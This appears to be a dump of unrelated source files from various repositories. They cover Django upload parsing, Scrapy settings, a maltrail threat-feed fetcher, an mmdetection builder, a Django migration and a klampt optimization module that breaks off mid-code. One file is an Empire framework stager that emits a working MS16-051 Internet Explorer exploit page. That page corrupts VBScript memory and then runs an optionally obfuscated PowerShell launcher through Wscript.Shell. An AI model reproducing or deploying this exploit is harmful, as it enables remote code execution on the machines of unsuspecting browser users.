"BSD-3-Clause"
] | null | null | null |
import inspect
import hashlib
import logging
import os
from django.core.files.uploadedfile import TemporaryUploadedFile
from django.db.models import FieldDoesNotExist
from django.db.models.fields.files import FileField
from django.http import QueryDict
from django.utils.datastructures import MultiValueDict
logger = logging.getLogger(__name__)
def parse_distutils_request(request):
"""Parse the `request.raw_post_data` and update the request POST and FILES
attributes .
"""
try:
sep = request.raw_post_data.splitlines()[1]
except:
raise ValueError('Invalid post data')
request.POST = QueryDict('', mutable=True)
try:
request._files = MultiValueDict()
except Exception:
pass
for part in filter(lambda e: e.strip(), request.raw_post_data.split(sep)):
try:
header, content = part.lstrip().split('\n', 1)
except Exception:
continue
if content.startswith('\n'):
content = content[1:]
if content.endswith('\n'):
content = content[:-1]
headers = parse_header(header)
if "name" not in headers:
continue
if "filename" in headers and headers['name'] == 'content':
dist = TemporaryUploadedFile(name=headers["filename"],
size=len(content),
content_type="application/gzip",
charset='utf-8')
dist.write(content)
dist.seek(0)
request.FILES.appendlist('distribution', dist)
else:
# Distutils sends UNKNOWN for empty fields (e.g platform)
# [russell.sim@gmail.com]
if content == 'UNKNOWN':
content = None
request.POST.appendlist(headers["name"], content)
def parse_header(header):
headers = {}
for kvpair in filter(lambda p: p,
map(lambda p: p.strip(),
header.split(';'))):
try:
key, value = kvpair.split("=", 1)
except ValueError:
continue
headers[key.strip()] = value.strip('"')
return headers
def delete_files(sender, **kwargs):
"""Signal callback for deleting old files when database item is deleted"""
for fieldname in sender._meta.get_all_field_names():
try:
field = sender._meta.get_field(fieldname)
except FieldDoesNotExist:
continue
if isinstance(field, FileField):
instance = kwargs['instance']
fieldfile = getattr(instance, fieldname)
if not hasattr(fieldfile, 'path'):
return
if not os.path.exists(fieldfile.path):
return
# Check if there are other instances which reference this fle
is_referenced = (
instance.__class__._default_manager
.filter(**{'%s__exact' % fieldname: fieldfile})
.exclude(pk=instance._get_pk_val())
.exists())
if is_referenced:
return
try:
field.storage.delete(fieldfile.path)
except Exception:
logger.exception(
'Error when trying to delete file %s of package %s:' % (
instance.pk, fieldfile.path))
def md5_hash_file(fh):
"""Return the md5 hash of the given file-object"""
md5 = hashlib.md5()
while True:
data = fh.read(8192)
if not data:
break
md5.update(data)
return md5.hexdigest()
| 29.878049
| 78
| 0.562993
|
7da649e07b984bd0448d2270ee2738e20e1b732a
| 3,229
|
py
|
Python
|
disney_fandom_crawler/settings.py
|
fiqrisr/disney_fandom_crawler
|
0151904a2ea0c3c3f7a3d14cf8aa05b9e512e4b1
|
[
"Apache-2.0"
] | 2
|
2021-04-16T06:31:55.000Z
|
2021-04-19T14:14:33.000Z
|
disney_fandom_crawler/settings.py
|
fiqrisr/disney_fandom_crawler
|
0151904a2ea0c3c3f7a3d14cf8aa05b9e512e4b1
|
[
"Apache-2.0"
] | null | null | null |
disney_fandom_crawler/settings.py
|
fiqrisr/disney_fandom_crawler
|
0151904a2ea0c3c3f7a3d14cf8aa05b9e512e4b1
|
[
"Apache-2.0"
] | null | null | null |
# Scrapy settings for disney_fandom_crawler project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = "disney_fandom_crawler"
SPIDER_MODULES = ["disney_fandom_crawler.spiders"]
NEWSPIDER_MODULE = "disney_fandom_crawler.spiders"
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'disney_fandom_crawler (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
# COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'disney_fandom_crawler.middlewares.DisneyFandomCrawlerSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'disney_fandom_crawler.middlewares.DisneyFandomCrawlerDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
"disney_fandom_crawler.pipelines.JsonWriterPipeline": 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 36.280899
| 103
| 0.781356
|
8f940dfd60e03191455d85830217b782194cb8db
| 689
|
py
|
Python
|
trails/feeds/minerchk.py
|
Jahismighty/maltrail
|
9bc70430993b2140ceb4dbac4b487251a9254416
|
[
"MIT"
] | 1
|
2021-01-10T14:35:36.000Z
|
2021-01-10T14:35:36.000Z
|
trails/feeds/minerchk.py
|
Jahismighty/maltrail
|
9bc70430993b2140ceb4dbac4b487251a9254416
|
[
"MIT"
] | 29
|
2018-10-18T20:14:49.000Z
|
2019-07-08T07:45:08.000Z
|
trails/feeds/minerchk.py
|
Jahismighty/maltrail
|
9bc70430993b2140ceb4dbac4b487251a9254416
|
[
"MIT"
] | 2
|
2018-11-29T22:50:57.000Z
|
2019-04-12T03:35:35.000Z
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://raw.githubusercontent.com/Hestat/minerchk/master/hostslist.txt"
__check__ = ".com"
__info__ = "crypto mining (suspicious)"
__reference__ = "github.com/Hestat"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#') or '.' not in line:
continue
retval[line] = (__info__, __reference__)
return retval
| 25.518519
| 82
| 0.656023
|
c99afd2d722bb350182afa532409dc6d715f4626
| 208
|
py
|
Python
|
mmdet/core/bbox/iou_calculators/builder.py
|
deepakksingh/mmdetection
|
b0d845f1fecf8064db30ef6b456b6ef5f36fa40f
|
[
"Apache-2.0"
] | 232
|
2021-05-25T12:55:24.000Z
|
2022-03-25T07:58:49.000Z
|
mmdet/core/bbox/iou_calculators/builder.py
|
deepakksingh/mmdetection
|
b0d845f1fecf8064db30ef6b456b6ef5f36fa40f
|
[
"Apache-2.0"
] | 51
|
2021-05-29T06:36:54.000Z
|
2022-03-27T09:24:39.000Z
|
mmdet/core/bbox/iou_calculators/builder.py
|
deepakksingh/mmdetection
|
b0d845f1fecf8064db30ef6b456b6ef5f36fa40f
|
[
"Apache-2.0"
] | 66
|
2021-06-01T03:40:08.000Z
|
2022-03-30T16:51:21.000Z
|
from mmcv.utils import Registry, build_from_cfg
IOU_CALCULATORS = Registry('IoU calculator')
def build_iou_calculator(cfg, default_args=None):
return build_from_cfg(cfg, IOU_CALCULATORS, default_args)
| 26
| 61
| 0.8125
|
7762887e1385534892167c2a4c274949017e2e72
| 8,197
|
py
|
Python
|
empire/server/stagers/windows/ms16-051.py
|
gr33nm0nk2802/Empire
|
886e5131d51b082325f57dc0a5c8eeb39fb04fe1
|
[
"BSD-3-Clause"
] | 1
|
2021-08-03T21:34:06.000Z
|
2021-08-03T21:34:06.000Z
|
empire/server/stagers/windows/ms16-051.py
|
gr33nm0nk2802/Empire
|
886e5131d51b082325f57dc0a5c8eeb39fb04fe1
|
[
"BSD-3-Clause"
] | null | null | null |
empire/server/stagers/windows/ms16-051.py
|
gr33nm0nk2802/Empire
|
886e5131d51b082325f57dc0a5c8eeb39fb04fe1
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import print_function
from empire.server.common import helpers
class Stager(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'MS16-051 IE RCE',
'Author': ['CrossGroupSecurity'],
'Description': (
'Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which '
'works on IE9/10/11 and all versions of Windows. Target will have to open link with vulnerable version '
'of IE.'),
'Comments': [
'https://github.com/CrossGroupSecurity/PowerShell-MS16-051-IE-RCE'
]
}
# any options needed by the stager, settable during runtime
self.options = {
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language': {
'Description': 'Language of the stager to generate.',
'Required': True,
'Value': 'powershell'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64': {
'Description': 'Switch. Base64 encode the output.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'Obfuscate': {
'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for '
'obfuscation types. For powershell only.',
'Required': False,
'Value': 'False',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'ObfuscateCommand': {
'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For '
'powershell only.',
'Required': False,
'Value': r'Token\All\1,Launcher\STDIN++\12467'
},
'OutFile': {
'Description': 'Filename that should be used for the generated output, otherwise returned as a string.',
'Required': False,
'Value': 'index.html'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, '
'or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listener_name = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscate_command = self.options['ObfuscateCommand']['Value']
user_agent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxy_creds = self.options['ProxyCreds']['Value']
stager_retries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
obfuscate_script = False
if obfuscate.lower() == "true":
obfuscate_script = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listener_name, language=language, encode=encode, obfuscate=obfuscate_script,
obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
stagerRetries=stager_retries)
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
else:
code = f"""
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
<script type="text/vbscript">
Dim aw
Dim plunge(32)
Dim y(32)
prefix = "%u4141%u4141"
d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
b = String(64000, "D")
c = d & b
x = UnEscape(c)
Class ArrayWrapper
Dim A()
Private Sub Class_Initialize
ReDim Preserve A(1, 2000)
End Sub
Public Sub Resize()
ReDim Preserve A(1, 1)
End Sub
End Class
Class Dummy
End Class
Function getAddr (arg1, s)
aw = Null
Set aw = New ArrayWrapper
For i = 0 To 32
Set plunge(i) = s
Next
Set aw.A(arg1, 2) = s
Dim addr
Dim i
For i = 0 To 31
If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
addr = strToInt(Mid(y(i), 3 + 4, 2))
End If
y(i) = Null
Next
If addr = Null Then
document.location.href = document.location.href
Return
End If
getAddr = addr
End Function
Function leakMem (arg1, addr)
d = prefix & "%u0008%u4141%u4141%u4141"
c = d & intToStr(addr) & b
x = UnEscape(c)
aw = Null
Set aw = New ArrayWrapper
Dim o
o = aw.A(arg1, 2)
leakMem = o
End Function
Sub overwrite (arg1, addr)
d = prefix & "%u400C%u0000%u0000%u0000"
c = d & intToStr(addr) & b
x = UnEscape(c)
aw = Null
Set aw = New ArrayWrapper
aw.A(arg1, 2) = CSng(0)
End Sub
Function exploit (arg1)
Dim addr
Dim csession
Dim olescript
Dim mem
Set dm = New Dummy
addr = getAddr(arg1, dm)
mem = leakMem(arg1, addr + 8)
csession = strToInt(Mid(mem, 3, 2))
mem = leakMem(arg1, csession + 4)
olescript = strToInt(Mid(mem, 1, 2))
overwrite arg1, olescript + &H174
Set Object = CreateObject("Wscript.Shell")
Object.run("{launcher}")
End Function
Function triggerBug
aw.Resize()
Dim i
For i = 0 To 32
' 24000x2 + 6 = 48006 bytes
y(i) = Mid(x, 1, 24000)
Next
End Function
</script>
<script type="text/javascript">
function strToInt(s)
{{
return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
}}
function intToStr(x)
{{
return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
}}
var o;
o = {{"valueOf": function () {{
triggerBug();
return 1;
}}}};
setTimeout(function() {{exploit(o);}}, 50);
</script>
</body>
</html>
"""
return code
| 31.40613
| 120
| 0.47615
|
435ac90c41870b7b9d343a0932ff263e82df77bc
| 466
|
py
|
Python
|
openprescribing/frontend/migrations/0028_prescription_net_cost.py
|
rebkwok/openprescribing
|
28c7500a7e4cb725fc6cda0f8c58b07ac7e916a4
|
[
"MIT"
] | null | null | null |
openprescribing/frontend/migrations/0028_prescription_net_cost.py
|
rebkwok/openprescribing
|
28c7500a7e4cb725fc6cda0f8c58b07ac7e916a4
|
[
"MIT"
] | null | null | null |
openprescribing/frontend/migrations/0028_prescription_net_cost.py
|
rebkwok/openprescribing
|
28c7500a7e4cb725fc6cda0f8c58b07ac7e916a4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-06-19 11:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('frontend', '0027_auto_20170616_0925'),
]
operations = [
migrations.AddField(
model_name='prescription',
name='net_cost',
field=models.FloatField(blank=True, null=True),
),
]
| 22.190476
| 59
| 0.622318
|
f864d0a0feb9ecfef773f6a0e9803c7a1232b104
| 68,226
|
py
|
Python
|
Python/python3_version/klampt/math/optimize.py
|
ipa-rmb-mr/Klampt
|
71793b54eead788811b4e62bcf8dadb49b68ff17
|
[
"BSD-3-Clause"
] | 1
|
2020-07-03T20:38:20.000Z
|
2020-07-03T20:38:20.000Z
|
Python/python3_version/klampt/math/optimize.py
|
tcrapse/Klampt
|
d5a334e73f1f24ba4c606e03f49915b353799a57
|
[
"BSD-3-Clause"
] | null | null | null |
Python/python3_version/klampt/math/optimize.py
|
tcrapse/Klampt
|
d5a334e73f1f24ba4c606e03f49915b353799a57
|
[
"BSD-3-Clause"
] | null | null | null |
"""Classes to help set up and solve nonlinear, constrained optimization
problems.
Supports local and global optimization. Wraps around scipy, pyOpt, or
DIRECT (for now).
Works well with the klampt.math.symbolic module.
"""
import numpy as np
import math,random
from . import symbolic,symbolic_io,symbolic_linalg
from ..io import loader
class OptimizationProblem:
"""A holder for optimization problem data. All attributes are optional,
and some solvers can't handle certain types of constraints and costs.
The objective function must return a float. All equality and inequality
functions are required to return a list of floats.
Attributes:
objective (function): an objective function f(x)
objectiveGrad (function): a function df/dx(x) giving the gradient of f.
bounds (tuple): a pair (l,u) giving lower and upper bounds on the search space.
equalities (list of functions): functions :math:`g(x)=0` required of a
feasible solution. In practice, :math:`|g(x)| \leq tol` is required,
where tol is a tolerance parameter for the solver.
equalityGrads (list of functions): gradient/Jacobian functions
:math:`\\frac{\partial g}{\partial x}(x)` of the
equality functions.
inequalities (list of functions): inequality functions requiring math:`h(x) \leq 0`
for a feasible solution.
inequalityGrads (list of functions): a list of gradient/Jacobian functions
:math:`\\frac{partial h}{\partial x}(x)` of each inequality function.
feasibilityTests (list of functions): boolean black-box predicates that must
be true of the solution
Suitable for use with the symbolic module. Once a Context is created, and
appropriate Variables, Functions, Expressions are declared, the
setSymbolicObjective and addSymbolicConstraint methods automatically determine
the standard Python function forms. I.e., context.makeFlatFunction(f,varorder)
where varorder = None for the default variable ordering.
The OptimizationProblemBuilder class is more closely tied with the symbolic
module and is more convenient to use. It performs automatic simplification
and differentiation, and can be saved / loaded to disk.
"""
def __init__(self):
self.objective = None
self.objectiveGrad = None
self.bounds = None
self.equalities = []
self.inequalities = []
self.equalityGrads = []
self.inequalityGrads = []
self.feasibilityTests = []
def setObjective(self,func,funcGrad=None):
self.objective = func
self.objectiveGrad = funcGrad
def addEquality(self,func,funcGrad=None):
self.equalities.append(func)
self.equalityGrads.append(funcGrad)
def addInequality(self,func,funcGrad=None):
self.inequalities.append(func)
self.inequalityGrads.append(funcGrad)
def setBounds(self,xmin,xmax):
self.bounds = (xmin,xmax)
def setFeasibilityTest(self,test):
self.feasibilityTests = [test]
def addFeasibilityTest(self,test):
self.feasibilityTests.append(test)
def setSymbolicObjective(self,func,context,varorder=None):
"""Sets an objective function from a symbolic Function or Expression
(see symbolic module)."""
if varorder is None: varorder = context.variables
fpy,varorder = context.makeFlatFunction(func,varorder)
dfpy,varorder = context.makeFlatFunctionDeriv(func,varorder)
self.setObjective(fpy,dfpy)
def addSymbolicConstraint(self,func,context,varorder=None,blackbox=False):
"""adds a constraint from a symbolic Function or Expression
(see symbolic module). This will be "smart" in that AND Expressions will be
converted to multiple constraints, inequalities will be converted to inequality
constraints, and bounds will be converted to bound constraints. All other
constraints will be treated as feasibility constraints"""
if varorder is None: varorder = context.variables
if symbolic.is_op(func,"and"):
for a in func.args:
self.addSymbolicConstraint(self,a,context,varorder)
elif symbolic.is_op(func,"le"):
if symbolic.is_var(func.args[0]) and symbolic.is_const(func.args[1]):
#x <= c
x = symbolic.to_var(func.args[0])
xmax = symbolic.to_const(func.args[1])
indices = context.getFlatVarRanges(varorder)
xindex = [i for i,v in enumerate(varorder) if v.name == x.name][0]
ai,bi = indices[xindex],indices[xindex+1]
n = indices[-1]
if self.bounds is None:
self.bounds = (np.array([-float('inf')]*n),np.array([float('inf')]*n))
self.bounds[1][ai:bi] = np.minimum(self.bounds[1][ai:bi],xmax)
elif symbolic.is_var(func.args[1]) and symbolic.is_const(func.args[0]):
#c <= x
xmin = symbolic.to_const(func.args[0])
x = symbolic.to_var(func.args[1])
indices = context.getFlatVarRanges(varorder)
xindex = [i for i,v in enumerate(varorder) if v.name == x.name][0]
ai,bi = indices[xindex],indices[xindex+1]
n = indices[-1]
if self.bounds is None:
self.bounds = (np.array([-float('inf')]*n),np.array([float('inf')]*n))
self.bounds[0][ai:bi] = np.maximum(self.bounds[0][ai:bi],a)
else:
h = symbolic.simplify(func.args[0]-func.args[1])
if func.args[0].returnType().is_scalar() and func.args[1].returnType().is_scalar():
#need to convert to a vector
h = symbolic.flatten(h)
hpy,varorder = context.makeFlatFunction(h,varorder)
dhpy,varorder = context.makeFlatFunctionDeriv(h,varorder)
self.addInequality(hpy,dhpy)
elif symbolic.is_op(func,"ge"):
c = (func.args[1] <= func.args[0])
self.addSymbolicConstraint(c,context,varorder)
elif symbolic.is_op(func,"eq"):
g = symbolic.simplify(func.args[0]-func.args[1])
if func.args[0].returnType().is_scalar() and func.args[1].returnType().is_scalar():
#need to convert to a vector
g = symbolic.flatten(g)
gpy,varorder = context.makeFlatFunction(g,varorder)
dgpy,varorder = context.makeFlatFunctionDeriv(g,varorder)
self.addEquality(gpy,dgpy)
elif symbolic.is_op(func):
if func.functionInfo is symbolic_linalg.bound_contains and symbolic.is_const(func.args[0]) and symbolic.is_const(func.args[1]) and symbolic.is_var(func.args[2]):
#bound constraint
xmin = symbolic.to_const(func.args[0])
xmax = symbolic.to_const(func.args[1])
x = symbolic.to_var(func.args[2])
indices = context.getFlatVarRanges(varorder)
xindex = [i for i,v in enumerate(varorder) if v.name == x.name][0]
ai,bi = indices[xindex],indices[xindex+1]
n = indices[-1]
if self.bounds is None:
self.bounds = ([-float('inf')]*n,[float('inf')]*n)
for i,a,b in zip(list(range(ai,bi)),xmin,xmax):
self.bounds[0][i] = max(self.bounds[0][i],a)
self.bounds[1][i] = min(self.bounds[1][i],b)
else:
#it's a generic boolean
if not blackbox:
print("OptimizationProblem.addSymbolicConstraint(): Warning, turning function",func,"into black box function")
fpy,varorder = context.makeFlatFunction(func,varorder)
self.addFeasibilityTest(fpy)
else:
#it's a generic boolean
if not blackbox:
print("OptimizationProblem.addSymbolicConstraint(): Warning, turning function",func,"into black box function")
fpy,varorder = context.makeFlatFunction(func,varorder)
self.addFeasibilityTest(fpy)
def objectiveValue(self,x):
"""Returns the objective function value f(x)."""
return self.objective(x)
def feasible(self,x,equalityTol=1e-6):
"""Returns true if x is a feasible point."""
for g in self.equalities:
gx = g(x)
if any(abs(v) > equalityTol for v in gx): return False
for h in self.inequalities:
hx = h(x)
if any(v > 0 for v in hx): return False
for f in self.feasibilityTests:
if not f(x): return False
return True
def equalityResidual(self,x):
"""Returns the stacked vector g(x) where g(x)=0 is the equality constraint."""
if len(self.equalities) == 0: return []
return np.hstack([g(x) for g in self.equalities])
def inequalityResidual(self,x):
"""Returns the stacked vector h(x) where h(x)<=0 is the inequality constraint."""
if len(self.inequalities) == 0: return []
return np.hstack([h(x) for h in self.inequalities])
def makeUnconstrained(self,objective_scale,keep_bounds=True):
"""If this problem is constrained, returns a new problem in which
the objective function is a scoring function that sums all of
the equality / inequality errors at x plus
objective_scale*objective function(x). If objective_scale is small,
then the scoring function is approximately minimized at a feasible
minimum.
If the problem is unconstrained, this just returns self.
If keep_bounds = true, this does not add the bounds to the
inequality errors.
"""
#create a scoring function that is approximately minimized at
#a feasible minimum
if keep_bounds == False:
raise NotImplementedError("getting rid of bounds is not implemented yet")
if len(self.feasibilityTests) == 0 and len(self.inequalities) == 0 and len(self.equalities) == 0:
#already unconstrained
return self
if len(self.inequalities) == 0 and len(self.equalities) == 0:
#just have a feasibility test
def flatObjective(x):
if any(not f(x) for f in self.feasibilityTests):
return float('inf')
return self.objective(x)
res = Problem()
res.setObjective(flatObjective,self.objectiveGrad)
res.bounds = self.bounds
return res
def flatObjective(x):
if any(not f(x) for f in self.feasibilityTests):
return float('inf')
f = 0
#add sum of squared equalities
for g in self.equalities:
gx = g(x)
f += max(abs(v) for v in gx)
for h in self.inequalities:
hx = h(x)
f += sum(max(v,0) for v in hx)
if self.objective is not None:
f += objective_scale*self.objective(x)
return f
res = Problem()
res.setObjective(flatObjective,None)
res.bounds = self.bounds
return res
class LocalOptimizer:
"""A wrapper around different local optimization libraries. Only
minimization is supported, and only scipy and pyOpt are supported.
The method is specified using the method string, which can be:
- auto: picks between scipy and pyOpt, whatever is available.
- scipy: uses scipy.optimize.minimize with default settings.
- scipy.[METHOD]: uses scipy.optimize.minimize with the argument
method=[METHOD].
- pyOpt: uses pyOpt with SLSQP.
- pyOpt.[METHOD]: uses pyOpt with the given method.
"""
def __init__(self,method='auto'):
if method == 'auto':
try:
import pyopt
method = 'pyOpt'
except ImportError:
method = 'scipy'
self.method = method
self.seed = None
@staticmethod
def methodsAvailable():
"""Returns a list of methods that are available on this system"""
methods = []
try:
import pyOpt
methods.append('pyOpt')
pyoptmethods = ['SLSQP','PSQP','SNOPT','COBYLA','NLPQL','NLPQLP','MMA','GCMMA','KSOPT']
for m in pyoptmethods:
try:
x = getattr(pyOpt,m)
methods.append('pyOpt.'+m)
except AttributeError:
pass
except ImportError:
pass
try:
import scipy
methods.append('scipy')
methods.append('scipy.Nelder-Mead')
methods.append('scipy.Powell')
methods.append('scipy.CG')
methods.append('scipy.BFGS')
methods.append('scipy.TNC')
methods.append('scipy.COBYLA')
methods.append('scipy.L-BFGS-B')
methods.append('scipy.SLSQP')
except ImportError:
pass
return methods
@staticmethod
def methodsAppropriate(problem):
"""Returns a list of available methods that are appropriate to use for the given problem"""
allmethods = LocalOptimizer.methodsAvailable()
if len(problem.inequalities) > 0 or len(problem.equalities) > 0:
#can only do SLSQP, PSQP, and SNOPT
methods = []
for m in allmethods:
if m=='scipy' or m=='pyOpt' or m.endswith('SQP') or m.endswith('SNOPT'):
methods.append(m)
return methods
elif problem.bounds is not None:
#only can do bounded problems
for m in LocalOptimizer.methodsAvailable():
if m=='scipy' or m=='pyOpt':
methods.append(m)
else:
if not any(m.endswith(x) for x in ['Nelder-Mead','Powell','CG','BFGS']):
methods.append(m)
return methods
else:
return allmethods
def setSeed(self,x):
self.seed = x
def solve(self,problem,numIters=100,tol=1e-6):
"""Returns a tuple (success,result)"""
if self.seed is None:
raise RuntimeError("Need to provide a seed state")
if problem.objective is None:
raise RuntimeError("Need to provide an objective function")
if self.method.startswith('scipy'):
from scipy import optimize
items = self.method.split('.')
scipyMethod = 'SLSQP'
if len(items)>1:
scipyMethod = items[1]
jac = False
if problem.objectiveGrad:
jac = problem.objectiveGrad
bounds = None
if problem.bounds:
bmin = [v if not math.isinf(v) else None for v in problem.bounds[0]]
bmax = [v if not math.isinf(v) else None for v in problem.bounds[1]]
bounds = list(zip(bmin,bmax))
constraintDicts = []
for i in range(len(problem.equalities)):
constraintDicts.append({'type':'eq','fun':problem.equalities[i]})
if problem.equalityGrads[i] is not None:
constraintDicts[-1]['jac'] = problem.equalityGrads[i]
for i in range(len(problem.inequalities)):
#scipy asks for inequalities to be positive g(x) >= 0, which requires a flip of sign
constraintDicts.append({'type':'ineq','fun':lambda x:-np.array(problem.inequalities[i](x))})
if problem.inequalityGrads[i] is not None:
constraintDicts[-1]['jac'] = lambda x:-np.array(problem.inequalityGrads[i](x))
if len(constraintDicts) > 0 and scipyMethod not in ['SLSQP','COBYLA']:
print("LocalOptimizer.solve(): warning, can't use method",scipyMethod,"with constraints")
input("Press enter to continue > ")
#print "Scipy constraints",constraintDicts
#print "Scipy bounds",bounds
#print "Objective jacobian",jac
res = optimize.minimize(problem.objective,x0=self.seed,method=scipyMethod,
jac=jac,bounds=bounds,
constraints=constraintDicts,tol=tol,options={'maxiter':numIters,'disp':True})
if res.success:
print("***********************************************************")
print("LocalOptimizer.solve(): Scipy solver result",res.message)
print(res)
x = res.x
print("My objective value:",problem.objective(x))
if len(problem.equalities) > 0:
h = np.hstack([f(x) for f in problem.equalities])
else:
h = [0]
if len(problem.inequalities) > 0:
g = np.hstack([f(x) for f in problem.inequalities])
else:
g = [0]
boundfeasible = all(a<=v and v<=b for v,a,b in zip(x,problem.bounds[0],problem.bounds[1])) if problem.bounds is not None else True
eqfeasible = all(abs(v)<tol for v in h)
ineqfeasible = all(v<=0 for v in g)
feasible = eqfeasible and ineqfeasible and boundfeasible
if not feasible:
if not boundfeasible:
#try clamping
for i in range(len(x)):
x[i] = min(max(x[i],problem.bounds[0][i]),problem.bounds[1][i])
boundfeasible = True
if len(problem.equalities) > 0:
h = np.hstack([f(x) for f in problem.equalities])
else:
h = [0]
if len(problem.inequalities) > 0:
g = np.hstack([f(x) for f in problem.inequalities])
else:
g = [0]
eqfeasible = all(abs(v)<tol for v in h)
ineqfeasible = all(v<=0 for v in g)
feasible = eqfeasible and ineqfeasible and boundfeasible
print("LocalOptimizer: solution not in bounds, clamped.")
print(" Bound-corrected equality residual",h)
print(" Bound-corrected inequality residual",g)
print(" Feasible?",eqfeasible,ineqfeasible)
if not feasible:
print("LocalOptimizer: Strange, Scipy optimizer says successful and came up with an infeasible solution")
if not eqfeasible:
print(" Equality has max residual",max(abs(v) for v in h),"> tolerance",tol)
print(" Residual vector",h)
if not ineqfeasible:
print(" Inequality has residual",max(v for v in h),"> 0")
print(" Residual vector",g)
if not boundfeasible:
for i,(v,a,b) in enumerate(zip(x,problem.bounds[0],problem.bounds[1])):
if v < a or v > b:
print(" Bound %d: %f <= %f <= %f violated"%(i,a,v,b))
input("Press enter to continue >")
print("***********************************************************")
return res.success,res.x.tolist()
elif self.method.startswith('pyOpt'):
import pyOpt
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
items = self.method.split('.')
pyOptMethod = 'SLSQP'
if len(items)>1:
pyOptMethod = items[1]
if problem.bounds is not None:
bmin = np.array(problem.bounds[0][:])
bmax = np.array(problem.bounds[1][:])
#for some reason PyOpt doesn't do well with infinite bounds
for i,v in enumerate(problem.bounds[0]):
if math.isinf(v): bmin[i] = -1e20
for i,v in enumerate(problem.bounds[1]):
if math.isinf(v): bmax[i] = 1e20
ubIndices = [i for i,v in enumerate(bmax) if not math.isinf(v)]
lbIndices = [i for i,v in enumerate(bmin) if not math.isinf(v)]
else:
ubIndices = []
lbIndices = []
def objfunc(x):
